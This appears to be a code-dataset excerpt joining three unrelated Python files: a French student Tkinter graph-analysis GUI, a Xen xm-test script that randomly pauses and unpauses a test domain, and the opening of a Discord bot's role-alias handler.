self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-10,self.temp[0][0]+10,self.temp[0][1]+10,fill="cyan")
self.graphe.create_text(self.temp[0][0],self.temp[0][1],text="{}".format(self.temp[0][4]))
a=(self.temp[0][0],self.temp[0][1]-10.5)
b=(self.temp[0][0],self.temp[0][1]-10)
self.graphe.create_line(a,b,arrow="last")
try:
self.entier=int(self.valeur.get())
except ValueError:
pass
if self.entier>0 or self.entier<0 :
pass
else:
self.entier=int(1)
self.couple.append([self.temp[0][4],self.temp[1][4],self.entier])
else:
a=[self.temp[0][0]-10,self.temp[0][1]]
b=[self.temp[1][0]+10,self.temp[1][1]]
self.graphe.create_line(a,b,arrow="last")
try:
self.entier=int(self.valeur.get())
except ValueError:
pass
if self.entier>0 or self.entier<0 :
pass
else:
self.entier=int(1)
self.couple.append([self.temp[0][4],self.temp[1][4],self.entier])
self.compt=int()
self.temp=list()
self.wm_attributes("-disable",False)
self.toplevel_dialog.destroy()
self.deiconify()
###########################################
# - Fenetre Graphe Orienter - #
# /////////////////////////////////////////////// #
# Description: Programme traitant sur les graphes #
# Orienter #
# /////////////////////////////////////////////// #
class Graphe_Non_Oriente(Tk):
def __init__(self):
Tk.__init__(self) # constructeur de la classe parente
#recupere la taille de l'ecrant de l'ordinateur
width=self.winfo_screenwidth()
height=self.winfo_screenheight()
self.largeure=900
self.hauteure=500
self.x=(width/2)-(self.largeure/2)
self.y=(height/2)-(self.hauteure/2)
#initialisation du canvas
self.graphe =Canvas(self, width =self.largeure, height =self.hauteure, bg ="white")
self.geometry('{}x{}+{}+{}'.format(self.largeure,self.hauteure,int(self.x),int(self.y)))
self.resizable(False,False)
self.wm_title('Graphe Non Oriente')
self.graphe.pack(side =TOP, padx =5, pady =5)
#evenement declancher par les clic de la sourie
self.bind("<Double-Button-1>", self.sommet)
self.bind("<Button-3>", self.arc)
#menu de la fenetre
menubar = Menu(self)
filemenu = Menu(menubar, tearoff = 0)
filemenu.add_separator()
filemenu.add_command(label = "Quitter ?", command = self.destroy)
filemenu.add_command(label = "Sauvegarder", command = self.save)
menubar.add_cascade(label = "Fichier", menu = filemenu)
filemenu = Menu(menubar, tearoff = 0)
filemenu.add_separator()
filemenu.add_command(label = "Ordre du graphe", command=self.ordre_graphe)
filemenu.add_command(label = "Degre du sommet", command=self.degres_sommet)
filemenu.add_command(label = "Matrice d'adjacence", command=self.matriceAdj)
filemenu.add_command(label = "Successeur du sommet", command=self.successeur)
filemenu.add_command(label = "Predecesseur du sommet", command=self.predeccesseur)
filemenu.add_command(label = "Graphe Hamiltonien ?", command=self.hamilton)
filemenu.add_command(label = "Graphe Eulerien ?", command=self.euler)
filemenu.add_command(label = "Flow maximal", command=self.maxflow)
menubar.add_cascade(label = "Traitement", menu = filemenu)
filemenu = Menu(menubar, tearoff = 0)
filemenu.add_command(label = "Tout effacer ?", command =self.delete)
menubar.add_cascade(label = "Effacer", menu = filemenu)
filemenu = Menu(menubar, tearoff = 0)
filemenu.add_command(label = "Aide", command =self.aide)
menubar.add_cascade(label = "Aide", menu = filemenu)
filemenu = Menu(menubar, tearoff = 0)
self.config(menu = menubar)
#variable globale
self.i=int(0)
self.compt=int()
self.temp=list()
self.connect=list()
self.point=list()
self.sommets=list()
self.couple=list()
self.matrice=list()
self.var=StringVar()
self.entier=int()
def delete(self):
for element in self.graphe.find_all():
self.graphe.delete(element)
self.i=int(0)
self.compt=int()
self.temp=list()
self.connect=list()
self.point=list()
self.sommets=list()
self.couple=list()
self.matrice=list()
self.var=StringVar()
self.entier=int()
pass
# fonction permettant de fermer la fenetre fille
def Close_Toplevel (self):
self.compt=int()
self.temp=list()
self.wm_attributes("-disable",False)
self.toplevel_dialog.destroy()
self.deiconify()
def aide(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,150)
self.toplevel_dialog.wm_title("Aide")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=150
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
self.toplevel_dialog.focus()
aide="""
Tracer un sommet: Double clic
Tracer un arc: clic gauche sur chaque sommet
"""
self.label=tk.Label(self.toplevel_dialog, text=aide,justify='left',font='Century 13 bold')
self.label.pack(side='top')
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
#fenetre permettant de fermet la fenetre fille de sauvegarde
def Close_Save (self,event=None):
if len(self.var.get())>0:
x=self.graphe.winfo_rootx()
y=self.graphe.winfo_rooty()
w=self.graphe.winfo_width()
h=self.graphe.winfo_height()
image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2))
image.save("save/{}.png".format(self.var.get()))
else:
x=self.graphe.winfo_rootx()
y=self.graphe.winfo_rooty()
w=self.graphe.winfo_width()
h=self.graphe.winfo_height()
image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2))
image.save("save/Graphe.png")
self.wm_attributes("-disable",False)
self.toplevel_dialog.destroy()
self.deiconify()
#fonction de sauvegarde du graphe dessiner
def save(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,100)
self.toplevel_dialog.wm_title("Sauvegarder")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Save)
self.label=tk.Label(self.toplevel_dialog, text='Entrer le nom de limage: ')
self.label.pack(side='left')
self.var=tk.Entry(self.toplevel_dialog)
self.var.pack(side='left')
self.var.bind("<Return>", self.Close_Save)
self.var.bind("<Escape>", self.Close_Toplevel)
self.var.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_Save)
self.yes_button.pack(side='right',fill='x',expand=True)
# fonction permettant de detecter si le graphe est eulerien
def euler(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,100)
self.toplevel_dialog.wm_title("Graphe eulerien")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
self.toplevel_dialog.focus()
l=len(self.couple)
lg=len(self.sommets)
if lg>=2:
g1 = Euler(lg)
for i in range(l):
g1.addEdge(self.couple[i][0],self.couple[i][1])
self.var=g1.test()
self.label=tk.Label(self.toplevel_dialog, text=self.var)
self.label.pack(side='top')
else:
self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
self.label.pack(side='top')
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
#fonction permettant de detecter si le graphe est hamiltonien
def hamilton(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,100)
self.toplevel_dialog.wm_title("Graphe hamiltonien")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
self.toplevel_dialog.focu()
lg=len(self.couple)
if lg>1:
l=len(self.sommets)
self.matrice=list()
for i in range(l):
self.matrice.append([])
for j in range(l):
k=int(0)
temp=list()
temp.append(self.sommets[i])
temp.append(self.sommets[j])
for element in self.couple:
if temp[0]==element[0] and temp[1]==element[1]:
self.matrice[i].append(1)
k+=1
if k==0:
self.matrice[i].append(0)
g1 = Hamilton(l)
g1.graph = self.matrice
self.var=g1.hamCycle()
self.label=tk.Label(self.toplevel_dialog, text=self.var)
self.label.pack(side='top')
pass
else:
self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
self.label.pack(side='top')
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
#fonction permettant de connetre le flow maximal
def maxflow(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,200)
self.toplevel_dialog.wm_title("Flow maximal")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=200
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.focus()
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet source: ')
self.label.grid(row=1)
self.valeur1=tk.Entry(self.toplevel_dialog)
self.valeur1.grid(row=1,column=1)
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet destination: ')
self.label.grid(row=2)
self.valeur2=tk.Entry(self.toplevel_dialog)
self.valeur2.grid(row=2,column=1)
self.label=tk.Label(self.toplevel_dialog, text='\n\n')
self.label.grid(row=3)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_maxflow)
self.yes_button.grid(row=4,column=1)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.grid(row=4,column=3)
pass
def Close_maxflow (self):
lg=len(self.couple)
if self.valeur1.get() in str(self.sommets) and self.valeur2.get() in str(self.sommets) and lg>0 and self.valeur1.get()!=self.valeur2.get() :
l=len(self.sommets)
self.matrice=list()
for i in range(l):
self.matrice.append([])
for j in range(l):
k=int(0)
temp=list()
temp.append(self.sommets[i])
temp.append(self.sommets[j])
for element in self.couple:
if temp[0]==element[0] and temp[1]==element[1]:
self.matrice[i].append(element[2])
k+=1
if k==0:
self.matrice[i].append(0)
g = Max_flow(self.matrice)
src=int(self.valeur1.get())
des=int(self.valeur2.get())
self.label=tk.Label(self.toplevel_dialog, text="Le flow maximal est %d " % g.FordFulkerson(src, des))
self.label.grid(row=6)
else:
self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
self.label.grid(row=6)
pass
def matriceAdj(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(300,300)
self.toplevel_dialog.wm_title("Matrice D'adjacence")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=300
hauteure=300
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
self.toplevel_dialog.focus()
lg=len(self.couple)
if lg>0:
l=len(self.sommets)
self.matrice=list()
for i in range(l):
resultat=""
resultat+=str(self.sommets[i])+"| "
self.matrice.append([])
for j in range(l):
k=int(0)
temp=list()
temp.append(self.sommets[i])
temp.append(self.sommets[j])
for element in self.couple:
if temp[0]==element[0] and temp[1]==element[1]:
self.matrice[i].append(1)
resultat+="1 "
k+=1
if k==0:
self.matrice[i].append(0)
resultat+="0 "
self.label=tk.Label(self.toplevel_dialog, text=resultat)
self.label.pack(side='top')
pass
else:
self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
self.label.pack(side='top')
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
#fonction permettant de donner le successeur d'un sommet
def successeur(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(650,100)
self.toplevel_dialog.wm_title("Successeur d'un sommet")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=650
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_suc)
self.toplevel_dialog.focus()
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
self.label.grid(row=1)
self.valeur=tk.Entry(self.toplevel_dialog)
self.valeur.grid(row=1,column=1)
self.valeur.bind("<Return>", self.Close_suc)
self.valeur.bind("<Escape>", self.Close_Toplevel)
self.valeur.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.grid(row=1,column=6)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_suc)
self.yes_button.grid(row=1,column=4)
pass
def Close_suc(self):
if self.valeur.get() in str(self.sommets):
resultat=""
for element in self.couple:
if self.valeur.get() == str(element[0]):
resultat+=str(element[1])+" "
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) successeur du sommet {} est: {}'.format(self.valeur.get(),resultat))
self.toplevel_dialog_label.grid(row=2)
else:
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
self.toplevel_dialog_label.grid(row=2)
def predeccesseur(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(650,100)
self.toplevel_dialog.wm_title("Predecesseur d'un sommet")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=650
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_pred)
self.toplevel_dialog.focus()
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
self.label.grid(row=1)
self.valeur=tk.Entry(self.toplevel_dialog)
self.valeur.grid(row=1,column=1)
self.valeur.bind("<Return>", self.Close_pred)
self.valeur.bind("<Escape>", self.Close_Toplevel)
self.valeur.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.grid(row=1,column=6)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_pred)
self.yes_button.grid(row=1,column=4)
def Close_pred(self):
if self.valeur.get() in str(self.sommets):
resultat=""
for element in self.couple:
if self.valeur.get() == str(element[1]):
resultat+=str(element[0])+" "
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) predecesseur du sommet {} est: {}'.format(self.valeur.get(),resultat))
self.toplevel_dialog_label.grid(row=2)
else:
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
self.toplevel_dialog_label.grid(row=2)
def degres_sommet(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(600,100)
self.toplevel_dialog.wm_title("Degre du sommet")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=600
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_degre)
self.toplevel_dialog.focus()
self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
self.label.grid(row=1)
self.valeur=tk.Entry(self.toplevel_dialog)
self.valeur.grid(row=1,column=1)
self.valeur.bind("<Return>", self.Close_degre)
self.valeur.bind("<Escape>", self.Close_Toplevel)
self.valeur.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.grid(row=1,column=5)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre)
self.yes_button.grid(row=1,column=3)
def Close_degre(self):
if self.valeur.get() in str(self.sommets):
k=int(0)
for element in self.couple:
if self.valeur.get() == str(element[1]):
k+=1
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le degre du sommet {} est: {}'.format(self.valeur.get(),k))
self.toplevel_dialog_label.grid(row=2)
else:
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
self.toplevel_dialog_label.grid(row=2)
def ordre_graphe(self):
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(502,50)
self.toplevel_dialog.wm_title("Ordre du graphe")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=502
hauteure=50
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
self.toplevel_dialog.fovus()
n=len(self.sommets)
self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='L ordre du graphe est: {}'.format(n))
self.toplevel_dialog_label.pack(side='top')
self.toplevel_dialog_yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=82,command=self.Close_Toplevel)
self.toplevel_dialog_yes_button.pack(side='right',fill='x',expand=True)
for i in range(3):
self.toplevel_dialog_label3=tk.Label(self.toplevel_dialog, text='\n')
self.toplevel_dialog_label3.pack()
pass
def sommet(self, event):
x,y=event.x,event.y
if self.point==[]:
self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan")
self.numero=self.graphe.create_text(x,y,text="{}".format(self.i))
self.point.append([event.x,event.y,self.sommet,self.numero,self.i])
self.sommets.append(self.i)
self.i+=1
else:
controle=0
for element in self.point:
if element[0]-25 < event.x < element[0]+25 and element[1]-25 < event.y < element[1]+25:
controle=1
if controle==0:
self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan")
self.numero=self.graphe.create_text(x,y,text="{}".format(self.i))
self.point.append([event.x,event.y,self.sommet,self.numero,self.i])
self.sommets.append(self.i)
self.i+=1
#procedure permettant de dessiner un arc entre deux sommets
def arc(self, event):
for element in self.point:
if element[0]-10 < event.x < element[0]+10 and element[1]-10 < event.y < element[1]+10:
self.temp.append(element)
self.compt+=1
if self.compt==2:
self.wm_attributes("-disable",True)
self.toplevel_dialog=tk.Toplevel(self)
self.toplevel_dialog.minsize(502,100)
self.toplevel_dialog.wm_title("Arc")
width=self.toplevel_dialog.winfo_screenwidth()
height=self.toplevel_dialog.winfo_screenheight()
largeure=502
hauteure=100
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
self.toplevel_dialog.transient(self)
self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
self.toplevel_dialog.bind("<Return>", self.Close_arc)
self.toplevel_dialog.focus
self.label=tk.Label(self.toplevel_dialog, text='Entrer la distance entre le sommet {} et le sommet {}: '.format(self.temp[0][4],self.temp[1][4]))
self.label.pack(side='top')
self.valeur=tk.Entry(self.toplevel_dialog)
self.valeur.pack(side='top')
self.valeur.bind("<Return>", self.Close_arc)
self.valeur.bind("<Escape>", self.Close_Toplevel)
self.valeur.focus_set()
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
self.yes_button.pack(side='right',fill='x',expand=True)
self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_arc)
self.yes_button.pack(side='right',fill='x',expand=True)
def Close_arc (self,event=None):
if self.temp[0][0] < self.temp[1][0]:
a=[self.temp[0][0]+10,self.temp[0][1]]
b=[self.temp[1][0]-10,self.temp[1][1]]
self.graphe.create_line(a,b)
try:
self.entier=int(self.valeur.get())
except ValueError:
pass
if self.entier!=0 :
pass
else:
self.entier=int(1)
self.couple.append([self.temp[0][4],self.temp[1][4],self.entier])
self.couple.append([self.temp[1][4],self.temp[0][4],self.entier])
elif self.temp[0][0]==self.temp[1][0]:
self.graphe.delete(self.temp[0][2])
self.graphe.delete(self.temp[0][3])
self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-25,self.temp[0][0]+1,self.temp[0][1])
self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-10,self.temp[0][0]+10,self.temp[0][1]+10,fill="cyan")
self.graphe.create_text(self.temp[0][0],self.temp[0][1],text="{}".format(self.temp[0][4]))
a=(self.temp[0][0],self.temp[0][1]-10.5)
b=(self.temp[0][0],self.temp[0][1]-10)
self.graphe.create_line(a,b)
try:
self.entier=int(self.valeur.get())
except ValueError:
pass
if self.entier>0 or self.entier<0 :
pass
else:
self.entier=int(1)
self.couple.append([self.temp[0][4],self.temp[1][4],self.entier])
self.couple.append([self.temp[1][4],self.temp[0][4],self.entier])
else:
a=[self.temp[0][0]-10,self.temp[0][1]]
b=[self.temp[1][0]+10,self.temp[1][1]]
self.graphe.create_line(a,b)
try:
self.entier=int(self.valeur.get())
except ValueError:
pass
if self.entier>0 or self.entier<0 :
pass
else:
self.entier=int(1)
self.couple.append([self.temp[0][4],self.temp[1][4],self.entier])
self.couple.append([self.temp[1][4],self.temp[0][4],self.entier])
self.compt=int()
self.temp=list()
self.wm_attributes("-disable",False)
self.toplevel_dialog.destroy()
self.deiconify()
######################################################
# - Programme Principale - #
# /////////////////////////////////////////////// #
# Description: Fenetre Principale du Programme #
# /////////////////////////////////////////////// #
if __name__ == '__main__':
#initialisation du canvas
fen =Tk()
width=fen.winfo_screenwidth()
height=fen.winfo_screenheight()
largeure=900
hauteure=500
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
graphe =Canvas(fen, width =largeure, height =hauteure ,bg="light yellow")
fen.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
fen.wm_title("Graphe Trace")
graphe.pack(side =TOP, padx =5, pady =5)
fen.resizable(False,False)
icon=PhotoImage(file='img/img.png')
fen.tk.call('wm','iconphoto',fen._w,icon)
photo = PhotoImage(file="img/img.png",width=largeure,height=hauteure)
graphe.create_image(300, 90, anchor=NW, image=photo)
def menu():
menubar = Menu(fen)
filemenu = Menu(menubar, tearoff = 0)
filemenu.add_command(label="Graphe Oriente", command = graphe_oriente)
filemenu.add_command(label="Graphe Non Oriente", command = graphe_non_oriente)
filemenu.add_separator()
filemenu.add_command(label = "Quitter", command = fen.destroy)
menubar.add_cascade(label = "Graphe", menu = filemenu)
filemenu = Menu(menubar, tearoff = 0)
filemenu.add_command(label = "Auteur", command = Auteur)
filemenu.add_command(label="Description", command = Description)
filemenu.add_command(label="Version", command = Version)
menubar.add_cascade(label = "A Propos", menu = filemenu)
fen.config(menu = menubar)
fen.mainloop()
pass
def donothing():
#filewin = Toplevel(root)
#button = Button(filewin, text="Do nothing button")
#button.pack()
pass
def graphe_oriente():
# mise en place du canevas
app = GrapheOriente()
app.mainloop()
fen.mainloop()
def graphe_non_oriente():
# mise en place du canevas
app = Graphe_Non_Oriente()
app.mainloop()
fen.mainloop()
def Auteur():
a_propos="""
Ce logiciel a ete creer par des etudiants
en deuxiemme annnee Miage.
Notamment par:
Sawadogo R.R Sylvain
Sawadogo Sidbewende Omar
Yameogo Pingdwinde Boris
"""
fen.wm_attributes("-disable",True)
fen.toplevel_dialog=tk.Toplevel(fen)
fen.toplevel_dialog.minsize(502,210)
fen.toplevel_dialog.wm_title("Auteur")
width=fen.toplevel_dialog.winfo_screenwidth()
height=fen.toplevel_dialog.winfo_screenheight()
largeure=502
hauteure=210
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
fen.toplevel_dialog.transient(fen)
fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel)
fen.label=tk.Label(fen.toplevel_dialog, text=a_propos,justify='left',font='Century 13 bold')
fen.label.grid(row=1,padx =5, pady =5)
fen.yes_button=ttk.Button(fen.toplevel_dialog,text='Ok',width=82,command=Close_Toplevel)
fen.yes_button.grid(row=2)
def Description():
a_propos="""
Ce logiciel a ete creer dans le cadre
de traitement de graphe.
"""
fen.wm_attributes("-disable",True)
fen.toplevel_dialog=tk.Toplevel(fen)
fen.toplevel_dialog.minsize(502,126)
fen.toplevel_dialog.wm_title("Description")
width=fen.toplevel_dialog.winfo_screenwidth()
height=fen.toplevel_dialog.winfo_screenheight()
largeure=502
hauteure=126
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
fen.toplevel_dialog.transient(fen)
fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel)
fen.label=tk.Label(fen.toplevel_dialog, text=a_propos,justify='left',font='Century 13 bold')
fen.label.grid(row=1,padx =5, pady =5)
fen.yes_button=ttk.Button(fen.toplevel_dialog,text='Ok',width=82,command=Close_Toplevel)
fen.yes_button.grid(row=2)
def Version():
a_propos="""Version 1.0.0"""
fen.wm_attributes("-disable",True)
fen.toplevel_dialog=tk.Toplevel(fen)
fen.toplevel_dialog.minsize(300,64)
fen.toplevel_dialog.wm_title("Version")
width=fen.toplevel_dialog.winfo_screenwidth()
height=fen.toplevel_dialog.winfo_screenheight()
largeure=300
hauteure=64
x=(width/2)-(largeure/2)
y=(height/2)-(hauteure/2)
fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
fen.toplevel_dialog.transient(fen)
fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel)
fen.label=tk.Label(fen.toplevel_dialog, text=a_propos,justify='left',font='Century 13 bold')
fen.label.grid(row=1,padx =5, pady =5)
fen.yes_button=ttk.Button(fen.toplevel_dialog,text='Ok',width=48,command=Close_Toplevel)
fen.yes_button.grid(row=4)
def Close_Toplevel ():
fen.wm_attributes("-disable",False)
fen.toplevel_dialog.destroy()
fen.deiconify()
menu()
fen.mainloop()
| 68,039 | 27,464 |
#!/usr/bin/python
# Copyright (C) International Business Machines Corp., 2005
# Author: Paul Larson <pl@us.ibm.com>
# Description:
# Positive Tests:
# Tests for xm unpause
# 1) Create domain, verify it's up with console
# 2) randomly pause and unpause the domain
# 3) unpause it one last time
# 4) verify it's still alive with console
import time
import commands
from random import *
from XmTestLib import *
# Create a domain (default XmTestDomain, with our ramdisk)
domain = XmTestDomain()
# Start it
try:
console = domain.start()
except DomainError, e:
if verbose:
print "Failed to create test domain because:"
print e.extra
FAIL(str(e))
try:
# Make sure a command succeeds
run = console.runCmd("ls")
except ConsoleError, e:
FAIL(str(e))
# Close the console
domain.closeConsole()
seed(time.time())
for i in range(100):
pauseit = randint(0,1)
if(pauseit):
# Pause the domain
status, output = traceCommand("xm pause %s" % domain.getName())
if status != 0:
FAIL("xm pause returned invalid %i != 0", status)
else:
# Unpause the domain
status, output = traceCommand("xm unpause %s" % domain.getName())
if status != 0:
FAIL("xm unpause returned invalid %i != 0", status)
# Make sure the domain is unpaused before we finish up
status, output = traceCommand("xm unpause %s" % domain.getName())
if status != 0:
FAIL("xm unpause returned invalid %i != 0", status)
# Are we still alive after all that?
try:
console = domain.getConsole()
run = console.runCmd("ls")
except ConsoleError, e:
FAIL(str(e))
# Close the console
domain.closeConsole()
if run["return"] != 0:
FAIL("console failed to attach to supposedly unpaused domain")
# Stop the domain (nice shutdown)
domain.stop()
| 1,829 | 597 |
import asyncio
from demobot.utils import *
from demobot.handlers import add_message_handler, nested_get, nested_set, nested_pop
from commands.utilities import save
async def running(Demobot, msg, reg):
if nested_get(msg.server.id, "roles", 'citizen') in msg.author.roles:
aliases = {
'rep': 'representative',
'representative': 'representative',
'ld': 'leader',
'pres': 'leader',
'president': 'leader',
'leader': 'leader'
}
